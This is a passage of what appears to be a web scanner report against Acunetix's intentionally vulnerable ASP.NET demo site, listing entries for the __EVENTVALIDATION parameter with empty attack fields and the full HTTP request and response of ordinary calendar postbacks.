</HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1113 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,113 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8313&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgAA4ItkptoIZGRkHNHncpSpihPfqLXxdWijgWnDu0M%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLrq5L%2BDALiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gKpdcLP1GA1jFVlrdtXlKioRH5WmQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:05:56 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgAA4ItkptoIZGRkHNHncpSpihPfqLXxdWijgWnDu0M=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLrq5L+DALiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gKpdcLP1GA1jFVlrdtXlKioRH5WmQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:White" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8166&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgDAJjHhMtoIZGRkdrzapZKAkKVLkw49IGsPxHVEovI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLRzOCpBQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esP%2B3BuhmTSxPH%2BsJ3abKF3TSLv9EA%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:27:10 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgDAJjHhMtoIZGRkdrzapZKAkKVLkw49IGsPxHVEovI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLRzOCpBQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esP+3BuhmTSxPH+sJ3abKF3TSLv9EA=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:White" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
